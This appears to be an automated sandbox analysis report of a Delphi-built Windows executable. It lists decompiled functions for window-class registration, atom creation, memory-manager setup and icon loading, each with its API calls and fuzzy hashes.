                                                                        • Associated: 00000002.00000002.749763098.000000000047A000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000002.00000002.749779338.000000000047B000.00000008.00020000.sdmp Download File
                                                                        • Associated: 00000002.00000002.749823728.0000000000495000.00000008.00020000.sdmp Download File
                                                                        • Associated: 00000002.00000002.749839062.0000000000496000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000002.00000002.749850256.000000000049C000.00000002.00020000.sdmp Download File
                                                                        Similarity
                                                                        • API ID: NtdllProc_Window
                                                                        • String ID:
                                                                        • API String ID: 4255912815-0
                                                                        • Opcode ID: b07c49574a18f71dbeb9c9cb54d623c337995a7866a732a5a16d698ec8b3bfc5
                                                                        • Instruction ID: 5803e6755cc40272ac919c0989782a04df59f5dce5c0c45c60d630398e48ec52
                                                                        • Opcode Fuzzy Hash: b07c49574a18f71dbeb9c9cb54d623c337995a7866a732a5a16d698ec8b3bfc5
                                                                        • Instruction Fuzzy Hash: 44F0C579215608AFCB40DF9DC588D4AFBE8BF4C260B058195BD88CB321C234FD808F94
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 00455364, Relevance: 21.1, APIs: 9, Strings: 3, Instructions: 130windowregistryCOMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 42%
                                                                        			E00455364(void* __eax, void* __ebx, void* __ecx) {
				struct _WNDCLASSA _v44;
				char _v48;
				char* _t22;
				long _t23;
				CHAR* _t25;
				struct HINSTANCE__* _t26;
				intOrPtr* _t28;
				signed int _t31;
				intOrPtr* _t32;
				signed int _t35;
				struct HINSTANCE__* _t36;
				void* _t38;
				CHAR* _t39;
				struct HWND__* _t40;
				char* _t46;
				char* _t51;
				long _t54;
				long _t58;
				struct HINSTANCE__* _t61;
				intOrPtr _t63;
				void* _t68;
				struct HMENU__* _t69;
				intOrPtr _t76;
				void* _t82;
				short _t87;

				_v48 = 0;
				_t68 = __eax;
				_push(_t82);
				_push(0x4554fb);
				_push( *[fs:eax]);
				 *[fs:eax] = _t82 + 0xffffffd4;
				if( *((char*)(__eax + 0xa4)) != 0) {
					L13:
					_pop(_t76);
					 *[fs:eax] = _t76;
					_push(0x455502);
					return E00404348( &_v48);
				}
				_t22 =  *0x495b34; // 0x496048
				if( *_t22 != 0) {
					goto L13;
				}
				_t23 = E0041D260(E00455880, __eax); // executed
				 *(_t68 + 0x40) = _t23;
				_t25 =  *0x47ac08; // 0x45504c
				_t26 =  *0x496714; // 0x400000
				if(GetClassInfoA(_t26, _t25,  &_v44) == 0) {
					_t61 =  *0x496714; // 0x400000
					 *0x47abf4 = _t61;
					_t87 = RegisterClassA(0x47abe4);
					if(_t87 == 0) {
						_t63 =  *0x4958e4; // 0x41d574
						E00406548(_t63,  &_v48);
						E0040A17C(_v48, 1);
						E00403DA8();
					}
				}
				_t28 =  *0x495998; // 0x496a9c
				_t31 =  *((intOrPtr*)( *_t28))(0) >> 1;
				if(_t87 < 0) {
					asm("adc eax, 0x0");
				}
				_t32 =  *0x495998; // 0x496a9c
				_t35 =  *((intOrPtr*)( *_t32))(1, _t31) >> 1;
				if(_t87 < 0) {
					asm("adc eax, 0x0");
				}
				_push(_t35);
				_push(0);
				_push(0);
				_push(0);
				_push(0);
				_t36 =  *0x496714; // 0x400000
				_push(_t36);
				_push(0);
				_t7 = _t68 + 0x8c; // 0x29c80044
				_t38 = E004047F8( *_t7);
				_t39 =  *0x47ac08; // 0x45504c, executed
				_t40 = E00407340(_t39, 0x84ca0000, _t38); // executed
				 *(_t68 + 0x30) = _t40;
				_t9 = _t68 + 0x8c; // 0x44d55c
				E00404348(_t9);
				 *((char*)(_t68 + 0xa4)) = 1;
				_t11 = _t68 + 0x40; // 0x10ac0000
				_t12 = _t68 + 0x30; // 0xe
				SetWindowLongA( *_t12, 0xfffffffc,  *_t11);
				_t46 =  *0x495a04; // 0x496b70
				if( *_t46 != 0) {
					_t54 = E00455F58(_t68);
					_t13 = _t68 + 0x30; // 0xe
					SendMessageA( *_t13, 0x80, 1, _t54); // executed
					_t58 = E00455F58(_t68);
					_t14 = _t68 + 0x30; // 0xe
					SetClassLongA( *_t14, 0xfffffff2, _t58); // executed
				}
				_t15 = _t68 + 0x30; // 0xe
				_t69 = GetSystemMenu( *_t15, "true");
				DeleteMenu(_t69, 0xf030, 0);
				DeleteMenu(_t69, 0xf000, 0);
				_t51 =  *0x495a04; // 0x496b70
				if( *_t51 != 0) {
					DeleteMenu(_t69, 0xf010, 0);
				}
				goto L13;
			}




























                                                                        0x0045536d
                                                                        0x00455370
                                                                        0x00455374
                                                                        0x00455375
                                                                        0x0045537a
                                                                        0x0045537d
                                                                        0x00455387
                                                                        0x004554e5
                                                                        0x004554e7
                                                                        0x004554ea
                                                                        0x004554ed
                                                                        0x004554fa
                                                                        0x004554fa
                                                                        0x0045538d
                                                                        0x00455395
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x004553a1
                                                                        0x004553a6
                                                                        0x004553ad
                                                                        0x004553b3
                                                                        0x004553c0
                                                                        0x004553c2
                                                                        0x004553c7
                                                                        0x004553d6
                                                                        0x004553d9
                                                                        0x004553de
                                                                        0x004553e3
                                                                        0x004553f2
                                                                        0x004553f7
                                                                        0x004553f7
                                                                        0x004553d9
                                                                        0x004553fe
                                                                        0x00455407
                                                                        0x00455409
                                                                        0x0045540b
                                                                        0x0045540b
                                                                        0x00455411
                                                                        0x0045541a
                                                                        0x0045541c
                                                                        0x0045541e
                                                                        0x0045541e
                                                                        0x00455421
                                                                        0x00455422
                                                                        0x00455424
                                                                        0x00455426
                                                                        0x00455428
                                                                        0x0045542a
                                                                        0x0045542f
                                                                        0x00455430
                                                                        0x00455432
                                                                        0x00455438
                                                                        0x00455444
                                                                        0x00455449
                                                                        0x0045544e
                                                                        0x00455451
                                                                        0x00455457
                                                                        0x0045545c
                                                                        0x00455463
                                                                        0x00455469
                                                                        0x0045546d
                                                                        0x00455472
                                                                        0x0045547a
                                                                        0x0045547e
                                                                        0x0045548b
                                                                        0x0045548f
                                                                        0x00455496
                                                                        0x0045549e
                                                                        0x004554a2
                                                                        0x004554a2
                                                                        0x004554a9
                                                                        0x004554b2
                                                                        0x004554bc
                                                                        0x004554c9
                                                                        0x004554ce
                                                                        0x004554d6
                                                                        0x004554e0
                                                                        0x004554e0
                                                                        0x00000000

                                                                        APIs
                                                                          • Part of subcall function 0041D260: VirtualAlloc.KERNEL32(00000000,00001000,00001000,00000040), ref: 0041D27E
                                                                        • GetClassInfoA.USER32 ref: 004553B9
                                                                        • RegisterClassA.USER32 ref: 004553D1
                                                                          • Part of subcall function 00406548: LoadStringA.USER32 ref: 00406579
                                                                        • SetWindowLongA.USER32 ref: 0045546D
                                                                        • SendMessageA.USER32 ref: 0045548F
                                                                        • SetClassLongA.USER32(0000000E,000000F2,00000000,0000000E,00000080,00000001,00000000,0000000E,000000FC,10AC0000,0044D4D0), ref: 004554A2
                                                                        • GetSystemMenu.USER32(0000000E,00000000,0000000E,000000FC,10AC0000,0044D4D0), ref: 004554AD
                                                                        • DeleteMenu.USER32(00000000,0000F030,00000000,0000000E,00000000,0000000E,000000FC,10AC0000,0044D4D0), ref: 004554BC
                                                                        • DeleteMenu.USER32(00000000,0000F000,00000000,00000000,0000F030,00000000,0000000E,00000000,0000000E,000000FC,10AC0000,0044D4D0), ref: 004554C9
                                                                        • DeleteMenu.USER32(00000000,0000F010,00000000,00000000,0000F000,00000000,00000000,0000F030,00000000,0000000E,00000000,0000000E,000000FC,10AC0000,0044D4D0), ref: 004554E0
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.749503743.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000002.00000002.749483060.0000000000400000.00000002.00020000.sdmp Download File
                                                                        • Associated: 00000002.00000002.749763098.000000000047A000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000002.00000002.749779338.000000000047B000.00000008.00020000.sdmp Download File
                                                                        • Associated: 00000002.00000002.749823728.0000000000495000.00000008.00020000.sdmp Download File
                                                                        • Associated: 00000002.00000002.749839062.0000000000496000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000002.00000002.749850256.000000000049C000.00000002.00020000.sdmp Download File
                                                                        Similarity
                                                                        • API ID: Menu$ClassDelete$Long$AllocInfoLoadMessageRegisterSendStringSystemVirtualWindow
                                                                        • String ID: H`I$LPE$pkI
                                                                        • API String ID: 2103932818-880299876
                                                                        • Opcode ID: 38e60ad4ba9bda075d6a227e52a730b6c34eac7e6b991cc39a7723496a2c1f00
                                                                        • Instruction ID: dba36a22936c401213b48a9bdafbdde789661dbc4a9e7479afdc9c550058aeec
                                                                        • Opcode Fuzzy Hash: 38e60ad4ba9bda075d6a227e52a730b6c34eac7e6b991cc39a7723496a2c1f00
                                                                        • Instruction Fuzzy Hash: A2418E707446406FE711EBA9DC92F6A33A8AB45305F154476FE04EF2E3DA78A844872D
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 004418D8, Relevance: 19.4, APIs: 7, Strings: 4, Instructions: 103registrylibraryloaderCOMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 85%
                                                                        			E004418D8(void* __ebx, void* __edi, void* __eflags) {
				char _v8;
				char _v12;
				char _v16;
				char _v20;
				char _v24;
				long _v28;
				char _v32;
				char _v36;
				intOrPtr _t25;
				char _t29;
				intOrPtr _t35;
				intOrPtr _t38;
				intOrPtr _t47;
				intOrPtr _t49;
				intOrPtr* _t50;
				intOrPtr _t53;
				struct HINSTANCE__* _t63;
				intOrPtr* _t78;
				intOrPtr* _t80;
				intOrPtr _t83;
				void* _t87;

				_v20 = 0;
				_v8 = 0;
				_push(_t87);
				_push(0x441a50);
				_push( *[fs:eax]);
				 *[fs:eax] = _t87 + 0xffffffe0;
				_v16 = GetCurrentProcessId();
				_v12 = 0;
				E0040936C("Delphi%.8X", 0,  &_v16,  &_v8);
				E0040439C(0x496b7c, _v8);
				_t25 =  *0x496b7c; // 0x21708a8
				 *0x496b78 = GlobalAddAtomA(E004047F8(_t25));
				_t29 =  *0x496714; // 0x400000
				_v36 = _t29;
				_v32 = 0;
				_v28 = GetCurrentThreadId();
				_v24 = 0;
				E0040936C("ControlOfs%.8X%.8X", 1,  &_v36,  &_v20);
				E0040439C(0x496b80, _v20);
				_t35 =  *0x496b80; // 0x21708c4
				 *0x496b7a = GlobalAddAtomA(E004047F8(_t35));
				_t38 =  *0x496b80; // 0x21708c4
				 *0x496b84 = RegisterClipboardFormatA(E004047F8(_t38));
				 *0x496bbc = E00414744(1);
				E004414DC();
				 *0x496b6c = E00441304(1, 1);
				_t47 = E00453F78(1, __edi);
				_t78 =  *0x495c2c; // 0x496c08
				 *_t78 = _t47;
				_t49 = E0045505C(0, 1);
				_t80 =  *0x495ad0; // 0x496c04
				 *_t80 = _t49;
				_t50 =  *0x495ad0; // 0x496c04
				E00456B68( *_t50, 1);
				_t53 =  *0x430eb0; // 0x430eb4
				E004139C4(_t53, 0x4336c0, 0x4336d0);
				_t63 = GetModuleHandleA("USER32");
				if(_t63 != 0) {
					 *0x47a8a8 = GetProcAddress(_t63, "AnimateWindow");
				}
				_pop(_t83);
				 *[fs:eax] = _t83;
				_push(0x441a57);
				E00404348( &_v20);
				return E00404348( &_v8);
			}
























                                                                        0x004418e1
                                                                        0x004418e4
                                                                        0x004418e9
                                                                        0x004418ea
                                                                        0x004418ef
                                                                        0x004418f2
                                                                        0x004418fe
                                                                        0x00441901
                                                                        0x0044190f
                                                                        0x0044191c
                                                                        0x00441921
                                                                        0x00441931
                                                                        0x0044193b
                                                                        0x00441940
                                                                        0x00441943
                                                                        0x0044194c
                                                                        0x0044194f
                                                                        0x00441960
                                                                        0x0044196d
                                                                        0x00441972
                                                                        0x00441982
                                                                        0x00441988
                                                                        0x00441998
                                                                        0x004419a9
                                                                        0x004419ae
                                                                        0x004419bf
                                                                        0x004419cd
                                                                        0x004419d2
                                                                        0x004419d8
                                                                        0x004419e3
                                                                        0x004419e8
                                                                        0x004419ee
                                                                        0x004419f0
                                                                        0x004419f9
                                                                        0x00441a08
                                                                        0x00441a0d
                                                                        0x00441a1c
                                                                        0x00441a20
                                                                        0x00441a2d
                                                                        0x00441a2d
                                                                        0x00441a34
                                                                        0x00441a37
                                                                        0x00441a3a
                                                                        0x00441a42
                                                                        0x00441a4f

                                                                        APIs
                                                                        • GetCurrentProcessId.KERNEL32(?,00000000,00441A50), ref: 004418F9
                                                                        • GlobalAddAtomA.KERNEL32 ref: 0044192C
                                                                        • GetCurrentThreadId.KERNEL32 ref: 00441947
                                                                        • GlobalAddAtomA.KERNEL32 ref: 0044197D
                                                                        • RegisterClipboardFormatA.USER32 ref: 00441993
                                                                          • Part of subcall function 00414744: RtlInitializeCriticalSection.KERNEL32(00411A90,?,?,004419A9,00000000,00000000,?,00000000,?,00000000,00441A50), ref: 00414763
                                                                          • Part of subcall function 004414DC: SetErrorMode.KERNEL32(00008000), ref: 004414F5
                                                                          • Part of subcall function 004414DC: GetModuleHandleA.KERNEL32(USER32,00000000,00441642,?,00008000), ref: 00441519
                                                                          • Part of subcall function 004414DC: GetProcAddress.KERNEL32(00000000,WINNLSEnableIME), ref: 00441526
                                                                          • Part of subcall function 004414DC: LoadLibraryA.KERNEL32(IMM32.DLL,00000000,00441642,?,00008000), ref: 00441542
                                                                          • Part of subcall function 004414DC: GetProcAddress.KERNEL32(00000000,ImmGetContext), ref: 00441564
                                                                          • Part of subcall function 004414DC: GetProcAddress.KERNEL32(00000000,ImmReleaseContext), ref: 00441579
                                                                          • Part of subcall function 004414DC: GetProcAddress.KERNEL32(00000000,ImmGetConversionStatus), ref: 0044158E
                                                                          • Part of subcall function 004414DC: GetProcAddress.KERNEL32(00000000,ImmSetConversionStatus), ref: 004415A3
                                                                          • Part of subcall function 004414DC: GetProcAddress.KERNEL32(00000000,ImmSetOpenStatus), ref: 004415B8
                                                                          • Part of subcall function 004414DC: GetProcAddress.KERNEL32(00000000,ImmSetCompositionWindow), ref: 004415CD
                                                                          • Part of subcall function 004414DC: GetProcAddress.KERNEL32(00000000,ImmSetCompositionFontA), ref: 004415E2
                                                                          • Part of subcall function 004414DC: GetProcAddress.KERNEL32(00000000,ImmGetCompositionStringA), ref: 004415F7
                                                                          • Part of subcall function 004414DC: GetProcAddress.KERNEL32(00000000,ImmIsIME), ref: 0044160C
                                                                          • Part of subcall function 004414DC: GetProcAddress.KERNEL32(00000000,ImmNotifyIME), ref: 00441621
                                                                          • Part of subcall function 004414DC: SetErrorMode.KERNEL32(?,00441649,00008000), ref: 0044163C
                                                                          • Part of subcall function 00453F78: GetKeyboardLayout.USER32 ref: 00453FBD
                                                                          • Part of subcall function 00453F78: GetDC.USER32(00000000), ref: 00454012
                                                                          • Part of subcall function 00453F78: GetDeviceCaps.GDI32(00000000,0000005A), ref: 0045401C
                                                                          • Part of subcall function 00453F78: ReleaseDC.USER32 ref: 00454027
                                                                          • Part of subcall function 0045505C: LoadIconA.USER32(00400000,MAINICON), ref: 00455141
                                                                          • Part of subcall function 0045505C: GetModuleFileNameA.KERNEL32(00400000,?,00000100,?,?,?,004419E8,00000000,00000000,?,00000000,?,00000000,00441A50), ref: 00455173
                                                                          • Part of subcall function 0045505C: OemToCharA.USER32(?,?), ref: 00455186
                                                                          • Part of subcall function 0045505C: CharLowerA.USER32(?,00400000,?,00000100,?,?,?,004419E8,00000000,00000000,?,00000000,?,00000000,00441A50), ref: 004551C6
                                                                        • GetModuleHandleA.KERNEL32(USER32,00000000,00000000,?,00000000,?,00000000,00441A50), ref: 00441A17
                                                                        • GetProcAddress.KERNEL32(00000000,AnimateWindow), ref: 00441A28
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.749503743.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000002.00000002.749483060.0000000000400000.00000002.00020000.sdmp Download File
                                                                        • Associated: 00000002.00000002.749763098.000000000047A000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000002.00000002.749779338.000000000047B000.00000008.00020000.sdmp Download File
                                                                        • Associated: 00000002.00000002.749823728.0000000000495000.00000008.00020000.sdmp Download File
                                                                        • Associated: 00000002.00000002.749839062.0000000000496000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000002.00000002.749850256.000000000049C000.00000002.00020000.sdmp Download File
                                                                        Similarity
                                                                        • API ID: AddressProc$Module$AtomCharCurrentErrorGlobalHandleLoadMode$CapsClipboardCriticalDeviceFileFormatIconInitializeKeyboardLayoutLibraryLowerNameProcessRegisterReleaseSectionThread
                                                                        • String ID: AnimateWindow$ControlOfs%.8X%.8X$Delphi%.8X$USER32
                                                                        • API String ID: 2984857458-1126952177
                                                                        • Opcode ID: 672fa2b76e77dd81ba940745a36baf8dc5993c4f787a0357a88adb70a8aa1e99
                                                                        • Instruction ID: 0033b563d108e4a526ad8c315f1ec0427d91b7655410c97774380eaa5b0c3b7d
                                                                        • Opcode Fuzzy Hash: 672fa2b76e77dd81ba940745a36baf8dc5993c4f787a0357a88adb70a8aa1e99
                                                                        • Instruction Fuzzy Hash: 88415FB4A002459FCB00FFB5D88269D77F5EB99308B12543BE405E77A2EB39A9008B5D
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 0045505C, Relevance: 12.4, APIs: 4, Strings: 3, Instructions: 125windowCOMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 94%
                                                                        			E0045505C(void* __ecx, char __edx) {
				char _v5;
				char _v261;
				void* __ebx;
				void* __ebp;
				intOrPtr _t39;
				intOrPtr _t42;
				intOrPtr _t43;
				struct HINSTANCE__** _t53;
				struct HICON__* _t55;
				intOrPtr _t58;
				struct HINSTANCE__** _t60;
				void* _t67;
				char* _t69;
				char* _t75;
				intOrPtr _t81;
				intOrPtr* _t88;
				intOrPtr* _t89;
				intOrPtr _t90;
				void* _t91;
				char _t93;
				void* _t104;
				void* _t105;

				_t93 = __edx;
				_t91 = __ecx;
				if(__edx != 0) {
					_t105 = _t105 + 0xfffffff0;
					_t39 = E00403940(_t39, _t104);
				}
				_v5 = _t93;
				_t90 = _t39;
				E0041C1DC(_t91, 0);
				_t42 =  *0x495a48; // 0x47a468
				if( *((short*)(_t42 + 2)) == 0) {
					_t89 =  *0x495a48; // 0x47a468
					 *((intOrPtr*)(_t89 + 4)) = _t90;
					 *_t89 = 0x456690;
				}
				_t43 =  *0x495aec; // 0x47a470
				_t109 =  *((short*)(_t43 + 2));
				if( *((short*)(_t43 + 2)) == 0) {
					_t88 =  *0x495aec; // 0x47a470
					 *((intOrPtr*)(_t88 + 4)) = _t90;
					 *_t88 = E00456888;
				}
				 *((char*)(_t90 + 0x34)) = 0;
				 *((intOrPtr*)(_t90 + 0x90)) = E004035AC(1);
				 *((intOrPtr*)(_t90 + 0xa8)) = E004035AC(1);
				 *((intOrPtr*)(_t90 + 0x60)) = 0;
				 *((intOrPtr*)(_t90 + 0x84)) = 0;
				 *((intOrPtr*)(_t90 + 0x5c)) = 0x80000018;
				 *((intOrPtr*)(_t90 + 0x78)) = 0x1f4;
				 *((char*)(_t90 + 0x7c)) = 1;
				 *((intOrPtr*)(_t90 + 0x80)) = 0;
				 *((intOrPtr*)(_t90 + 0x74)) = 0x9c4;
				 *((char*)(_t90 + 0x88)) = 0;
				 *((char*)(_t90 + 0x9d)) = 1;
				 *((char*)(_t90 + 0xb4)) = 1;
				_t103 = E00425C8C(1);
				 *((intOrPtr*)(_t90 + 0x98)) = _t52;
				_t53 =  *0x49597c; // 0x49602c
				_t55 = LoadIconA( *_t53, "MAINICON"); // executed
				E0042605C(_t103, _t55);
				_t20 = _t90 + 0x98; // 0x736d
				_t58 =  *_t20;
				 *((intOrPtr*)(_t58 + 0x14)) = _t90;
				 *((intOrPtr*)(_t58 + 0x10)) = 0x456df8;
				_t60 =  *0x49597c; // 0x49602c
				GetModuleFileNameA( *_t60,  &_v261, 0x100);
				OemToCharA( &_v261,  &_v261);
				_t67 = E0040ACE8(0x5c, _t109);
				_t110 = _t67;
				if(_t67 != 0) {
					_t27 = _t67 + 1; // 0x1
					E00408C34( &_v261, _t27);
				}
				_t69 = E0040AD10( &_v261, 0x2e, _t110);
				if(_t69 != 0) {
					 *_t69 = 0;
				}
				CharLowerA( &(( &_v261)[1]));
				_t31 = _t90 + 0x8c; // 0x44d55c
				E004045B0(_t31, 0x100,  &_v261);
				_t75 =  *0x495874; // 0x496034
				if( *_t75 == 0) {
					E00455364(_t90, _t90, 0x100); // executed
				}
				 *((char*)(_t90 + 0x59)) = 1;
				 *((char*)(_t90 + 0x5a)) = 1;
				 *((char*)(_t90 + 0x5b)) = 1;
				 *((char*)(_t90 + 0x9e)) = 1;
				 *((intOrPtr*)(_t90 + 0xa0)) = 0;
				E00456FD4(_t90, 0x100);
				E00457914(_t90);
				_t81 = _t90;
				if(_v5 != 0) {
					E00403998(_t81);
					_pop( *[fs:0x0]);
				}
				return _t90;
			}

























                                                                        0x0045505c
                                                                        0x0045505c
                                                                        0x00455069
                                                                        0x0045506b
                                                                        0x0045506e
                                                                        0x0045506e
                                                                        0x00455073
                                                                        0x00455076
                                                                        0x0045507c
                                                                        0x00455081
                                                                        0x0045508b
                                                                        0x0045508d
                                                                        0x00455092
                                                                        0x00455095
                                                                        0x00455095
                                                                        0x0045509b
                                                                        0x004550a0
                                                                        0x004550a5
                                                                        0x004550a7
                                                                        0x004550ac
                                                                        0x004550af
                                                                        0x004550af
                                                                        0x004550b5
                                                                        0x004550c5
                                                                        0x004550d7
                                                                        0x004550df
                                                                        0x004550e4
                                                                        0x004550ea
                                                                        0x004550f1
                                                                        0x004550f8
                                                                        0x004550fe
                                                                        0x00455104
                                                                        0x0045510b
                                                                        0x00455112
                                                                        0x00455119
                                                                        0x0045512c
                                                                        0x0045512e
                                                                        0x00455139
                                                                        0x00455141
                                                                        0x0045514a
                                                                        0x0045514f
                                                                        0x0045514f
                                                                        0x00455155
                                                                        0x00455158
                                                                        0x0045516b
                                                                        0x00455173
                                                                        0x00455186
                                                                        0x00455193
                                                                        0x00455198
                                                                        0x0045519a
                                                                        0x0045519c
                                                                        0x004551a5
                                                                        0x004551a5
                                                                        0x004551b2
                                                                        0x004551b9
                                                                        0x004551bb
                                                                        0x004551bb
                                                                        0x004551c6
                                                                        0x004551cb
                                                                        0x004551dc
                                                                        0x004551e1
                                                                        0x004551e9
                                                                        0x004551ed
                                                                        0x004551ed
                                                                        0x004551f2
                                                                        0x004551f6
                                                                        0x004551fa
                                                                        0x004551fe
                                                                        0x00455207
                                                                        0x0045520f
                                                                        0x00455216
                                                                        0x0045521b
                                                                        0x00455221
                                                                        0x00455223
                                                                        0x00455228
                                                                        0x0045522f
                                                                        0x00455239

                                                                        APIs
                                                                        • LoadIconA.USER32(00400000,MAINICON), ref: 00455141
                                                                        • GetModuleFileNameA.KERNEL32(00400000,?,00000100,?,?,?,004419E8,00000000,00000000,?,00000000,?,00000000,00441A50), ref: 00455173
                                                                        • OemToCharA.USER32(?,?), ref: 00455186
                                                                        • CharLowerA.USER32(?,00400000,?,00000100,?,?,?,004419E8,00000000,00000000,?,00000000,?,00000000,00441A50), ref: 004551C6
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.749503743.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000002.00000002.749483060.0000000000400000.00000002.00020000.sdmp Download File
                                                                        • Associated: 00000002.00000002.749763098.000000000047A000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000002.00000002.749779338.000000000047B000.00000008.00020000.sdmp Download File
                                                                        • Associated: 00000002.00000002.749823728.0000000000495000.00000008.00020000.sdmp Download File
                                                                        • Associated: 00000002.00000002.749839062.0000000000496000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000002.00000002.749850256.000000000049C000.00000002.00020000.sdmp Download File
                                                                        Similarity
                                                                        • API ID: Char$FileIconLoadLowerModuleName
                                                                        • String ID: ,`I$4`I$MAINICON
                                                                        • API String ID: 3935243913-2513232985
                                                                        • Opcode ID: 8dedb8289d0bfbca90d2ab047fa0c34e34e9769703f07b68c9575f29396866f2
                                                                        • Instruction ID: 7165f6ef90a4096c26261ca2b15fb1af64d1f8c3d9a5e3545fba0b08bd0ef4cb
                                                                        • Opcode Fuzzy Hash: 8dedb8289d0bfbca90d2ab047fa0c34e34e9769703f07b68c9575f29396866f2
                                                                        • Instruction Fuzzy Hash: 59515F706046449FDB41DF29C8C5B867BE4AB15308F4481BAEC48CF397D7BAD9888B69
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 00401AA0, Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 48memoryCOMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 68%
                                                                        			E00401AA0() {
				void* _t11;
				signed int _t13;
				intOrPtr _t19;
				void* _t20;
				intOrPtr _t23;

				_push(_t23);
				_push(E00401B56);
				_push( *[fs:edx]);
				 *[fs:edx] = _t23;
				_push(0x4965c4);
				L004013F4();
				if( *0x496049 != 0) {
					_push(0x4965c4);
					L004013FC();
				}
				E00401464(0x4965e4);
				E00401464(0x4965f4);
				E00401464(0x496620);
				_t11 = LocalAlloc(0, 0xff8); // executed
				 *0x49661c = _t11;
				if( *0x49661c != 0) {
					_t13 = 3;
					do {
						_t20 =  *0x49661c; // 0x7e2258
						 *((intOrPtr*)(_t20 + _t13 * 4 - 0xc)) = 0;
						_t13 = _t13 + 1;
					} while (_t13 != 0x401);
					 *((intOrPtr*)(0x496608)) = 0x496604;
					 *0x496604 = 0x496604;
					 *0x496610 = 0x496604;
					 *0x4965bc = 1;
				}
				_pop(_t19);
				 *[fs:eax] = _t19;
				_push(E00401B5D);
				if( *0x496049 != 0) {
					_push(0x4965c4);
					L00401404();
					return 0;
				}
				return 0;
			}








                                                                        0x00401aa5
                                                                        0x00401aa6
                                                                        0x00401aab
                                                                        0x00401aae
                                                                        0x00401ab1
                                                                        0x00401ab6
                                                                        0x00401ac2
                                                                        0x00401ac4
                                                                        0x00401ac9
                                                                        0x00401ac9
                                                                        0x00401ad3
                                                                        0x00401add
                                                                        0x00401ae7
                                                                        0x00401af3
                                                                        0x00401af8
                                                                        0x00401b04
                                                                        0x00401b06
                                                                        0x00401b0b
                                                                        0x00401b0b
                                                                        0x00401b13
                                                                        0x00401b17
                                                                        0x00401b18
                                                                        0x00401b24
                                                                        0x00401b27
                                                                        0x00401b29
                                                                        0x00401b2e
                                                                        0x00401b2e
                                                                        0x00401b37
                                                                        0x00401b3a
                                                                        0x00401b3d
                                                                        0x00401b49
                                                                        0x00401b4b
                                                                        0x00401b50
                                                                        0x00000000
                                                                        0x00401b50
                                                                        0x00401b55

                                                                        APIs
                                                                        • RtlInitializeCriticalSection.KERNEL32(004965C4,00000000,00401B56,?,?,0040233A,021714A0,?,00000000,?,?,00401D29,00401D3E,00401E8F), ref: 00401AB6
                                                                        • RtlEnterCriticalSection.KERNEL32(004965C4,004965C4,00000000,00401B56,?,?,0040233A,021714A0,?,00000000,?,?,00401D29,00401D3E,00401E8F), ref: 00401AC9
                                                                        • LocalAlloc.KERNEL32(00000000,00000FF8,004965C4,00000000,00401B56,?,?,0040233A,021714A0,?,00000000,?,?,00401D29,00401D3E,00401E8F), ref: 00401AF3
                                                                        • RtlLeaveCriticalSection.KERNEL32(004965C4,00401B5D,00000000,00401B56,?,?,0040233A,021714A0,?,00000000,?,?,00401D29,00401D3E,00401E8F), ref: 00401B50
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.749503743.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000002.00000002.749483060.0000000000400000.00000002.00020000.sdmp Download File
                                                                        • Associated: 00000002.00000002.749763098.000000000047A000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000002.00000002.749779338.000000000047B000.00000008.00020000.sdmp Download File
                                                                        • Associated: 00000002.00000002.749823728.0000000000495000.00000008.00020000.sdmp Download File
                                                                        • Associated: 00000002.00000002.749839062.0000000000496000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000002.00000002.749850256.000000000049C000.00000002.00020000.sdmp Download File
                                                                        Similarity
                                                                        • API ID: CriticalSection$AllocEnterInitializeLeaveLocal
                                                                        • String ID: X"~$l8~$|8~
                                                                        • API String ID: 730355536-2538315497
                                                                        • Opcode ID: 4b702e9c7921f94c24e7c027581dd264e32c8e6686b16004a7e4da62ebbcb975
                                                                        • Instruction ID: e3fa4044cabce3705ee1953a6e939e98ba2ac419389a6aed450bfef70ff098bf
                                                                        • Opcode Fuzzy Hash: 4b702e9c7921f94c24e7c027581dd264e32c8e6686b16004a7e4da62ebbcb975
                                                                        • Instruction Fuzzy Hash: 440180B0644240AEEB26AB6AA806B197FE5D755718F07803FE000A66F2DBBD5C45CF1D
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 00454754, Relevance: 10.6, APIs: 7, Instructions: 89COMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 89%
                                                                        			E00454754(void* __eax, void* __ebx, void* __ecx, void* __edi) {
				char _v5;
				struct tagLOGFONTA _v65;
				struct tagLOGFONTA _v185;
				struct tagLOGFONTA _v245;
				void _v405;
				void* _t23;
				int _t27;
				void* _t30;
				intOrPtr _t38;
				struct HFONT__* _t41;
				struct HFONT__* _t45;
				struct HFONT__* _t49;
				intOrPtr _t52;
				intOrPtr _t54;
				void* _t57;
				void* _t72;
				void* _t74;
				void* _t75;
				intOrPtr _t76;

				_t72 = __edi;
